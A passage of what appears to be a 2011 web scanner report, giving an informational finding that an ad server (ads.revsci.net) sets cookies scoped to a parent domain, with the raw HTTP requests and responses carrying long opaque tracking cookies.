IWPluELGIVZSpte+L2p8Ak8G+6f39QiQNX9sYMuyPRDbuBHfKyeNWHJBFhuqK4/xZ7D/CTqehq/ghqdhipMBw5Tkr8mdUR/zxczguAqS4lU2jGjyE9g5myCi05INSSRNE5L4DNh54JKfld0ePji0KKkmwnQEKhnIFcxkTlb237bhRQDP++3zP1j2hiLU3mg4xi1Bay7LsKGEYilyYgtuJxssb25KbKk0l2Nx+BftGsREymmYzUPlB6j58myYGRehdpGh0wJvXFJhEomvMt3+RVVtU/Hs/dJeH/HekE15CjTKMwIovoWyWLWkLk/6AzLofDM76Xj3/75JEbK9bptsRjxMDFAem9ySqV4jf0esg7pJ4iPlT5pMZ10V4CW1LSJQcWkybORfD0N5UTmssjs9H6zArVaijt0fVauRh7dRVBdULPsaJ7riVOn6Uyy3PpnD9ux5E93rqsEK1x7fbJO18nv264KJ7YWZM5gXP2LEWHxvabbxbwwGJ1QhIMhDB0OoWtqmkDKiV/MucnamXFEmet8G/Cjst1gkpmYPuG6pBgUPehivSI0fOzA0wV/YCP1uYirYyEalVKutJsu2eWT6Je8BzKdbq10UjW6IpkVn4Go3iH0RzBFoGh24tA44C3aKTJa/2frujwGy2nzvvlF0sL6Rj1PGg46xmLjjYE5SjtBW0D/I+k61vl+3uQyzZb33wWkGruFU4eK51kxOG6IX6C3L2EZDPaFw5tQnQjHUEIn0UPw/CZ7yH+a0h5BL5t32WMOXQTwq/Vl4lnroXyo6Vhf1SzulnavN4Twzu12B47v"; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ8U7xE84mx8cR/xmi3McKUrpVsIwOgHBRuY4DkmM2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oL6zR/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkcZJg/g==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xqR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xqR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TX2x="MLsXrqEO5ihr4JB0esFCP3iNF+pqmlub45YPlOnX049VyMgTcqeWbmnipeB/JrGlJxU5Qewy9Qy2xGUW1fNZS3kgjaogVEgRJznRYvE/JCag2Zhy6/wqe3cIKLE2F4M5TRkHAwa4UhPEVrUN6TcHwqPWgepSOQrGAMWEKXgI9aveV2o/GKg/ikUWZjkM9grghNsod56+40pt0DeP3Sd6CuqR8ruJunOVms0ndtVb56pTF3/HT8AO9lmyq+AMe5jCaXvQksjDJ4VC0lmY7unMPsDKbVmJUsKOb8v47dLpuyu6az+axXednbh2eR3WtwuljO3JdXEPiX2V4wjTz4W7NmCNAMSMId/sniOHHhRcjK9XkuTEEoHl7vuHZ1Cbo2hjlBeXj2B0v1V8F4+hXYuCP4EhlmxFYNCRwiJ0EJPQLmGPpFxsINKEe28fB0FZdc3/eWHMXvBpoBl+ZHXtsYYnorsWC3MqdMRsWIySLSCcOwJnn79Fau6gNDZnPubc0PZB/ls5Z1iUwyOUu7LJZczu78pm2ChSJOCOzkxlPYCEbZyU6vBm+BalK/Pji05l60F2I7Ok/QBlq/scbqnVAmUgEgs2bHZJsiOBoOgzZwLVOSOgmhj3ZIMtuQSSmMTwAYLYnhDwGOJDHITdE4WOuAahUOZ7+UczOYlEyqFQgb1J5xuiZ/4jixcblsFW1MDHuy1RdUOlLFkACldJmAsrxuhKQTznkR2N1rGV85nMgZnlyagVMdufeF+qIv5p3gGebL7zyrSl/lEqwDP4XDOMetQ+Neg3AiuVfUJvFlFNKkkVzA9x0P2IP38RiV/PbdAWB7nT3E+S7HZH4omgJh+DIF3t/+gIKIpTcKQhEvV78bZFFGzmI2yntSoW8Hdx4ivfk5+6WM9sl16wegwKjXMncglzHEnQRSvXvBIFFZ9usXyyqs8KgvqW6CBP/g30+hZfR6iS+tmplYgJPY4Yx66Hl3F5RihsK7f80BTu5iNJwhoA39T+xU/T7C5INS6fzjAj1UHmVY1vpvDzf6ukd8fRlASqp6GN0oAKlEPaZY7GPIc="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUM1IzlHMAYY1A3HkAz1jyt3+1Rp5ZIgoudOS17C7yspOfwTPCNo1WG46bHYwCUC8Wl4wOOguOEurHKK5ymr4fckNKrCI/THbZusvT5koQZT2sgHJub8zAl8yeylWtCht+vqujN0CpLrK5Tb2vMbgRJvPHqMnm0VtLZDe43ydtJA4M05NTSETlisaIkMM/QOAsK+xFPZvnV/pfa5TRBbUukihA5ZLSa46K3CuW8xC3kpZNoWwdNV3yYmD8B8maDBHhbaYLm5/P02m612E1eGsoE97abrfw59xky8uJvZD0i8e3kCU/2FJnVmWnFnXpoxPT7es73wF1fCklA9xyNLi8Ih4fiXI6qtwZkH/k1iaETBrRbU3dybWFOLhNA+UIJ9dbAxlqUWnaWHilccc8JOE+ayRhKJFkoXh6E93wHyutpKStK8FmoxhIJQj7mgJOHLwH7M+zDfqsN6VeXO7UdKtgs3/Hm9LBSRuY/rmLTta203lnZYmWArQ5o7m8D+D/L5ZJcLgfsVYk+qKg3NzYC9tSmkw4omQ4OHqqs+BLAbUpya9N3VPWK1On1xQ3geEPdqDYF+uzceqtbOgWCsm31fyWV0qru7N3uKuHhqBpEL3Q+XaQUKxPc3BnNkF3jjSqwKQfPQ9Va2ptUui3c95cJae4XzS5rw7p3T6njaQPraWTpGTUqa4FFbuSqyUgnm5tHE7IROv7SIqI/WHR6k6AoLuNw4C/G4XA/5o8Q8x69IDZCWryuvSsN8TcJk6/5yjDOK5L9XZH0LqgSL+LYAGvnexRIqOvM/bZ0NFDx3hBkbPmeIvPXqWY+BMRV4Ql/ZJbcTYD92zqCFgBQxGKNSaNS4eWlv5+TzDLCmL5oiWg2NWo0gsP6/az/jA/a8mx9sRhwx99RdFP2VLI9rT690NKMJbPxh3Js4WouDskrJLxgvE8DgXWmUbopc6NOwyrgScDE7Fa+41sZcfA7Kvo/2kwxKPITepHYKgn/YWAwat43+Je5lbKm4oGGz8lIebZ/pSa6rYtmjBYvM4FqvfQpvwd/ryRC2ULgCpmdMLyxtvVYoYul+rddV9Us5XMBNPBQJNRgPlWvL544A6ioDWszv97zpIYHRVPm/YNfvQFhM0+bDBi9cPOGIOSSh008PYUZptfdE68d/XznQDJe3vt2BTT8Cfi7Ww1c7BSfIjoUwgjXjO94RjOQwIt2417qBxKEhQ6XcrE9+TixRqfjrLMtJGUhqC6AOjQVLtPkFdgLBRk0KBgXJ7ITEMFxGo22bjDupzkfdAYIKgqZHvHlu3D1XbEPVy2TYGogy8zL2qgodd4acPkIUxaNnO4+R6D0cG6+5k3HMVIanTW5JY/4yZUr5L8CeFqUc5MyhwDGr8YDHFI6MygEvKh4QQkeR4dF/Q8yimeh+7Oj+JuRw6OHK3iKIKTExLmGkMuPSOZ0jZEVLHC0VyIj+rmC9jqxRv1E7SydLJMlLbkba/zFi5zeeuf6foNmAo3U1CxM0a775iAQRqN1M5k5P3vNgqvutTIE9NeCxGjOzzfw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 13:59:44 GMT

GIF89a.............!.......,...........D..;
9.12. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_random=208878393&rsi_pub=E083D538668BB69EC4795771A0EDA581&rsi_site=626E5E04865D079794DE6011BF30AD87&rsi_width=728&rsi_height=90&rsi_secure=0&rsi_url=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&rsi_referrer=&rsi_title=Highly%20publicized%20murder%20of%20Caylee%20Anthony%20rivets%2C%20enrages%20%7C%20FLORIDA%20TODAY%20%7C%20floridatoday.com&rsi_inf=0 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsiPus_oJ6I="MLsXrqEO5ihr4JB0esFCP3iTwKJkgx2gQRTIgLpbO5bzUKo5agSRamM8BUBiXf5iQVJE/qvOLDxrtPlWva+WFfRLnrsgVEgRJznRYvE/JCbIJlFRZ0v8lk2FMP7VgY0aDJ1uvr3sxbowAuFyRMBuLfYcr6fFEv89nuq04UGKmDchPxvf1VTgDWJTEx5Kkr8jzQunm+6oPneCoGtSQhyGHZzxdfyY9pzlPM/onuX9X2JdmNFRliGjpOxxE+0pD+DBZZWgpAquHQkJ1YB5V5px1bD3K+pKttxiYRyYsLRuin4AdpE+D57tHyWhDKXYnaxmhDlbT40RVZTlQWa5SHr/yRW15cgoL2BTNz4ZHIOIbZ3w+GOVtetiHdAwjqA5Ui4WrA6bK25LLI4Ir9sIh2o24VUvkbMIaqCDNsF2jNanIWOT86v7ILEO8GTv7ysgdBPV7GNAhaATIC6+9HWKklodYgNie3KEsyxp4Ip53yIQktBt7x0rOG5/65JnmRP6pZbn0beJZ9e2WzN097dXeixXnHdq6JFVAyAbmpVkkwNOY+wWd6dg4Jf/QXM8CJVkFVKLOlMwzlBml/4yW2mwTMAgsUWTbJEe3D5h5Qu+avLmgFYgCdm3afOE65XEGgbY6gQI2QyUKfE89OzxvQEeuV8Z29PLI2LFlmgFNy3CKVxZ5PwiIOfTemnz/u34vuwdvk5OwPoIKx6wc64f4XUyQCxKRAMtrDlD3lqOkddwPiQPQWSdxvqE7+8qAf4lJEA0RdLVS+EOIKQcs4IiqbmLClAFvanxVnt8+DAJ/at8TweJdiurVsUJ39ifvys0hlSV/6J8xDBFRvnTXW7RHu077j5I8EhkX0VLoUvlsoHLXJRFSkMMdD1Rjk6kj6u7MTXab7InNjSHU6mj9FV6J71+hVaENmvO6xRYxe8DwuUoxcZGfl++Mz5gpSVkriCBhEEVGAa0whhl40WBypkKGx6ytK8eGBxCHtMy7YXpAt8GVfXO2nHdDF5NRbljpX5a2idAiaY9hZRKaSwdCl0zO8qy8rZheiOX4dGOkvvILbHnPIk="; rsi_us_1000000="pUM1Iz9HMAYU1O2WQ6agQvHtomeqiTx+scbgotrS/irrnp9hR1uXbUVk0H3WxoeLl/xLNe9VpQo58/SfnwRIVPklZlA8PnoYUYWIbDUqYS9zQYnZsUoP3QRkponkl0tHHb8kkKwgkXBko7XOn1jpgcgJQ3/+sBnkvl0R76S9Yt1TpYoxEcshze8XSI9IYwGJZAQM8acKU6QFRiQuOSfWyKPrE4VIXPPwX8RUWiY/UssOCRqN2G4sqarRk4NsaJRnlj2K1Y5HUKhRsrHbW1pTdRNtT9ZKulZhziyboYdrEO2sarAl/MFVZsjwi/Wv3qLm1Fs/xHiIfiPD8ptaFv53hhEy0x9Nzgra6z5i1sNDBdwC2AMM5jmRxk1HiSJ7rc7geNXoMpcoW5lazev62kFjic7GRlCPMyreliDoEbRStv8bUX0hzqBtlrJJ71XkLAtbR3bp3YXVlT/i03+GD+X4pnqR31ooqOicd/3sY/HfyHpsfYFpK+9cKfsOK0TMqmEZgg6TVATszTa6DVBy+9HIW60cgGORBfFeA3V7ZWrc7A/f4TCz6oav7WuUpl/8FU3EZiYlcqNpGIiqu0EDyUFyBc0Mm83cLtn7n1YkzNAWKjM3BMlNOvL7luAFxGav7veb18OL8FnDLIcc98IdSjePgO4x+TnvWMc1o3LMnx7KFnEVNL/zr/l7lPtA+JVzT7cnj2wyE4QaQHKh6Ok04D+HbZpnYVGPcUhH7ir4iXn1X1fRi2WC4X27+2MYNn6XJpgOOB6hxeYRKJezFPVyYHA0E8k8Y6vPmqAzcUQ1GgmrtVMO5TynL7MxkjlDhd/qkAAADTkEWFYjM+71vkik63NbiYJzNhUruoYNDY4+Cdad8nntQwYFdaZi2z0oTqrM2W9VLHxiO/W3OZ/DoHhIVOR05q3qEJsSQqz4HlTPFqdP6tMOPEdT2mlN6I+snoH5H1+95/20PTZV63bqPslFDdpjQUzOUzlGEQz5vlwfpcobNG6ZffmcfXkVRA90ZS5vDX6RoLFO4jXs4PfHmOaxRujzc+ZZx71yBGG4cW6a3AIc/QKBNjPUub61ya2Yeam0YNeI4XUBKw1I8arhmHwBw24bTrJB78myPAavjRhXseaoyMiRz2SpgrQict90ITDGOCmvQzQHHUwrMEuS4OMOI9nlvFiigkXOsxfJqbwLbPJxK7vepa4gP5k5reKfLJLOzB1tAhyu+0M+ogOQqwjKAaQSNYVRfyphA/AzKCF02DWfoPvuUecdYTEKFjQ1VG+g3YxKNYroKXLd8VGMnDiPqMcBJGPJAP5XjR0FOhbahAhbE9hcU3YzJtc0N15WcuBwumA6aiTCtPbC5GocnaApsWij2wpzPNdaYaar/KwBLK+unvGZw9So2/L8umdKyijf1qIYR3BsN1iRRVSFtpq1rjLe/12ruK+l5hbTSkGCxSxVj27tdXKbj+wNhb0Grx0f0RVz96JdXLab+X7gER0OWV6Ub93Iau3V3nA8U2eR3eW8WCzYma60upmY8LQB1Wa9Fjetzfo="; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ0VKwgyhnjOvVX8lAqNNGQnydj1ObQFnZ3eyoEiP2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oH68R/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkRkxg7A==; rtc_Wdkl=MLvn9zU1JwprpgZts8KQPOfaDcghJRY/syRG3WmM3le4ahJ60DTLD9+eQw9TOWi3mDGoGjklUGHxoEY411AnlDFR7yxZ8S+5rurGG9f9pKwr4QIY3riFWwRW2/4Pe6fIj9pfpVEFteudvD/rxinl01fHUDRopiXl3GV8QG4osgcIGNdQx253r5pJdcwR9YNyu0DNQTJxMId3nnJVUuDBpShinKA4tGa1cJ5+Hi2h59O3EJ9kKg9GI5OyNT9anWrXE6ywNFSU8AW4cLbauLlR5eS2CLmnPIYYHKESl6oWWm0MTZXo6HvTRjOh3Kxjjr71vvRTm7L5Tz/0AbnlXpfN5o3CS5RjdMCB3pJQ2xQbBI3eRje/yubp9KxdtHOub8fTM28fZtJ4Ff2evOSytK6+rguHT8qBsX3nAF+4suLuuzKXbljxXplpid99mfevz1NlGM1rlme7TFJHFw4T1WuGDkF0/Bw+17f4hzOZ89iGWZOwrinriMKVgfY7jgoThgi2LCqlToo4fv3BlxJBfv516scfvSGQii09J+OKaow2IMFHec2le5u592GGLOoNfhzh0wpAqny0dXMRunGZyuZpmgLUxyUcKEwjHtT4X/AWCCCKORS/JMUrvxw3RAPJ6tF7CPQVmN7vqfcMGol2PIwqma6LxPH616WqLSzSnYgrsHT0TROIWZVFqnuaJM072T0MT5VgEjbfrOrd4LflERbjcTxSI2oeuTXiK4/DDbsMpXxVYN1Y2+usrIA2tC4YKZcBieXRepuUWczdfoZq+FnW2fy54+8Ahj2DVr9lOeaPFz2YdxRA1DSkZ4p5j9nptFqVYRp7FQzd3L/rYbDcNwxsgNzSO1d/3MsEpZ+u6l/tYp6235d2EPF1lJvs+eY9ItWr2vywljErTzIjlFHOn3/vKN1lEO73a0MbZqAdadvoFSbLJ0FvE19rnlZr+jLJUArQXcyjG6qIfxe/x1qg9xSiD31RT940BPPNPFuSB3jU1xCgzxdwZN+cLq4+t59GjXdlNZMYlZEgjb2U0xa8rhgytOKQKj8cmLxuSqaEZ+rWPzIohHg8f7s/uwKkvXH7iStjrfLqN0iCTEktKJXa/EwxS3z/MCvPn1r/idkifyjhHKEVC9C8zVl28Q/obJ7v8A4+p79u6ECvoWawsZnxyX2Sk6D9FNVYNlOJvedTMFsJwjXTr5IfjCyqZk/UBqwFopBNsF8mpjRgy0jItxUL6s4Q7hJdKlt00izGkWFGjIaDJ5kgZqTbls7bo0uCnBhS0EivUGf5It9R036YZRZQhxLAMohm4BfvheaScBd0B6LD+dTsBOvBZt9qi8tKiSbAaWZAZG0kSm+xaQ8kjECVabgciinTfHRfdpcUgspdFtG/gYEj/BGsLUEDEDI7RiOCgIHqoGp9U8cm+NPOB87TWiP0V9cm6dG/MoQEGnmIEcpVMkMbUqQQPupK8MsZQ14dKvTqSRi8zQdNUKGRl/VBOD0x4AipEdvfcRFT77t0mzC0MtmgixiyT97l2MWc7nrXw+dbSqjkDo/V3VevRKGZiARbawBaubiTK1iTZ5X/QPG06n9m/GdUjFWTiJTeUtEsWyR/00AFRQ1ar060riKgW0WNe5vm1v/hmD2/AqXENoELyR0vXiP4im0//qAix0JrmEcuVRVnuzsHTORwkiEWyF8n88lfFjkZL4mXL6Ur0sWd4e2vaJRwp8A=; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39SEpbjpv597JcdnUBu4MHEenRCd8VPQOZXj35OaFc5qnI8MKCuGnn1SBN3Wnlqzb1/yfNaxCbp9btShq6NvtHJWkO5yz1lh5l92l+unpO8a62HEC0Ow3WsLVWsQO/LH6+aoOEKzXH626/J57yCfXh/SJ94hwXC0dfP558ntGi+TU3NFRXHYa8+u6SoZXLSsbbKVaGlLBJWNm8hDUZzQqCt6nJiWA5uBufndLwp+daMTDTfyoG0u88UrfSLKLtUwmK9Nc4+z6EEtp+jVizB4mNweBK4+LPHOgz7mIIN1zEXOuNDS2M3fG45TcRhoFUg7VUoH4CrMwF5Hpm1b9QGhYTjezLcjOEtLIYizka+GxtFQp+VpovDwshk/5DWsqucfelZBHOq6PNkU4W0j0xbqkwPek+ROrQddfTZv1pNfgRSYxFVvPYmCb4nrJkE6/Peg3SlGFEn9/rySzxBikRJmE3/M+lcGEQtcTVk6XNz4n/DcRuhSFd65APv6NbKeC0HI6lNEUNzL+w64Hg+pG4olOwauUJwKqznmt+LB5rRjeluO8lSlvSBWQGVjhFm+gIpo9t+Yxqi4Z6uY0wSPgV8rTfN48XfW9RTj7ci2zEgmrOn1sN6QxSV7zb2x9cF1Mg+BA9sVQEMOsTWxmc+20Gr2V6H9VMFkU2ChzWlllS1boIRa3E/f1sBgqwD6TvxrYAvRkVVeal/ThwkU0nX8scPQiZzAqIs3IeNjBUiNOMadIxaU9pT5zdkTfaCQLjbTqbQPN35UFLAQBoj8ANYBC749UUW3BXFOcvPiv+T4YmYn9O9+lruitAIYyG9TQLPJnVSINqWfDptNc1BkY+p2mgA00NHBRERyw0E6NiPaBaltF6a56LYEXqfbbF/Gu4Wf77t5UCPm1daS12CqLzhf91ykW8SLmb14HhEZ6jZGGvdPljDhV/m9VoiyOCYbeLW/aUAcz5LJUBeoWHNBb7NaLvlgsIj4LI51awNXjRD4dphanGc82HIPY364YbduxCjYn3qTfpSrm/exLtSUxnAbQn4cG/qOec4i7XuuCoaWMrKMGX/I+uCJ2q7C2N0bVCkMZBSEVEEshLUVLQ9TcCpEo72HPSAWY9AgCPz+RdghUBRpyOB9CmRHKmYe5kupGqYYAY8zLxVOdDQPO95g4jYDw856TtCNHODN+d10UHIyZRtWfFpavvlcymO88CcT4BmFmzBVeXmO4ypieT8f+T0bRs6sbp6oxezSidqCe+kgT1niBnV6hwEbiOULFjWaip799DGaPudLBvACvunnTH8sAt5jLFhSMvJ4EzaFro1t7dUzN7znrBxyRg94NxPi8SY5T4sRRXw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_D-6M="MLsXsqMOJjhv5pB0GuK8L0HP6TxvTJOb5RPKlFjm2oawXHqkUpttbu+TpTQ7/r5k2TkfGHxsBiWalfeAB/i2ZeDVh3sNrEwwJAMx4il/KokORw7o/SdsY9rD5Rran1cYTu5H2glQ6wiGGbe7BONawjupeQmuCxD6wLXUENGDz17XkpjDubHWNj6MzdO20TKeo2ebTm+X/aIFIAjSHwRm25h7faDJboBly37SaRVTJmVSVncsdODBYijyuPYTdFwC03sgxGgMINUQBU941lqVIMhGuSaJnSZ1bjvqoCCRDLRyqJCi6WnVSUpydvqvGWVlBYhxf+2EJFBlcMlHTpZKXGT1HeSqJJiOoXZpr/uvbpKdN1F5nqoIZKyR9HZy2TbKbYnBNFxzgutHbw6zXXppgfBJaWgOtCOMhs/ZZJ3OA1pxSjhPMmisV+EotP7wA2c0D7Io2lBYNXPe+9NRjvYmJrWaYkh2V9cxr+G5/xpyO81WenMWdhNnGRMtQomwCOTzjyZJYxNaLgOUEIIKY/A87ufnJ5qjqqB+BP8joxvEdW3W1Npu2B+Na3ecvL1Hhc5ZC1GBTQF0B1zfcmgxi8UCiZBmR2u4TvNpihWJeHOeADYhYgHy7fOE602RwkvfJpCdu7CgEkl/EapX90ymBIYIqwTRnrIV8fRqLA/JDPUN6wj4Po1l5cmK4VoP0sL52LnFEkGOXjlWFKb/dz4QQVlB3RU1uDB5Q2eyVzyWDhLN6+otEMWxip/DPpeVZFX20gRQOs9ik/EEMEZ5SBlEKXm9E12aY3Lb8xP23GKX6t28Fv8oVf0A9Hzq3RgaRIvYuSeHKg9n7kgHYmsqEC5FNeGc7ov2Rk7IAiVAilbtLgqkH3JaN/btEetkR3e86wQSucxk5aStmOWDZrorIifNpOczosSxBSP3da2SvQWkfJfNRVfxtlhd7qB8LBiXDl2SUm9TMHyJ+KLZ20a5mxC8xN7Om6Kt5yd5T28UAIR5tZznNV/NkyVtt/ytpEiB8NmrJm1LxAnC+RcrDEAr8/agqLZBIx3GTt7wIpqdhFr58Dzg"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUN9Iz9DOAYU1O2uA3Nf1wgg9Tpj7P8STnjz/8LS/qprmdrNu/Wv+Yp2mpP2gxUFQc/rlHGwyyG/2blenQfG1l0Q/iLSgjgPy6DOmNB2RidToi9fOv5uXgl8+4W0L5YmY28pH9JqakD06xSknvL5GRJuLPqNluHWRddDf63qduJIoP35MjeUiF+saJEMy/UOMsbiRDD+AqcM3wOeIhml4rFWgSAbj5SiITj5PrU4NK/fHsY65IwlXPMI/pKzvuGuzGzhzcEk1KynD5qCt8jOSkM2oAlc0wx6QlyPfCUZPATyRdNFhEM5y9lsLQ0p8cg4khQHQccUe1bCkkhdhyNLjcJh4RhXA7qtoRmA/3jVPEVUy61DKwIuJLIHRusqJVlbHTumZDnWUlnilqW9jrYlGM4+dhWXAfb4gtdKaz0GKHus33rMTSxatHCCitc45ODJwXHyOzv/BcA6smRRrYOTGGrag2N6reait+mxyihdCmQBnnZYh2AjQyI1DujvXsL5ZBYLhfsRYs+tan3tzYKttQmkwnqlQ4vHKqg6BIgbUvya8t7FHWwzO3V3Q3AcEP9oXSVv6oMtWTCV98nh0Alk8ravDhoJbJkk3NhdxtyWNrFELGmL/PNXc1h9zBAY9vEeNFGRkVf2u+Mui0cz5sNGO8Uzy5sT+eHKqO0Lmtn0vA7CspugEbQv/vdjaBRqge2SjgrxVqGBFx82gTqIDlHt06oiisS2tQF5pRZbQrxnMZ5to24HAkZhEcKgWJOBJJBtJr5X5kUPq6xZgyzowadexRLuAcwobZ0FFCxzxOyiPmeJMgbKV8+BMRRwQl7ZZTczcD92zqidoBQxGLupenkFRWHHCzlhmwYSyRBPqEdgyW4BPKRdwlJ3PZul3jLx1PtQ4NRdGHd5YH1BsN0KCa9yZCW9yODwolH/aBISyjfq0mg+ILAD634YEvdwzGwHe6n0NZxKYYZCDhUuKwz9gCXdEuFItH0gBJApTVgbxbVJBw9SYPnDTm20ZnCUGnXDMGOeRjFFIE9e7Z+UWuTTsnHpU0l5prxyTXe7oRSxpEBEk/ZqjaXH2B+6cd+R0f/jFy2EMYm6+pJDwthlUTpRDB0YZ0iUsB/sp3GzuDrmZKUmBcxvnrxfYDmLFGZpcsmlejWoWCCK1ygwfY0CDcigYCPasCONAsMXSSO2PlVZ3X9r+WNc9ZxAhE3kS3bni2yb64gi/FusJre1KWVPFoYCnANej9xGlU/w37shrHplGwwi2CmPIhr8ESop1mEX0CN9mqRhC5UV+837fNG18SC3vWzvuax0/sY9ZAK+vVhycciXqeVl6l2aRvZs5QBtWoIyaTCIIPUqsvFmBAGDmJ+zmYerK9EBYZJt7pp+wasNsfeq8+lJLwmmQvtWOLtWraxYr8ZZ24/BijoxGDUTdTpDpeeWDA6VmccDk+Ah9R/lF9IXZWDidngc8JPc3C7ITqz4YFQjkYRQ+lKF7SX8xQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:29 GMT
Content-Length: 1582

